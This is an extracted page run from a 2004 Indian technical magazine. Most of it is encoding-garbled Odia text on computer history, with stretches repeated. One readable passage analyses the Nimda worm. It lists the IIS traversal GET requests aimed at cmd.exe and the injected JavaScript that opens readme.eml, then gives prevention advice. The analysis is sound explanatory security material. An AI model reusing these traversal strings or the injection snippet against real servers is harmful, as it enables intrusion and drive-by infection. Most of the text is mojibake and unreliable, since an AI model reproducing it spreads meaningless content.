cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 43: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn 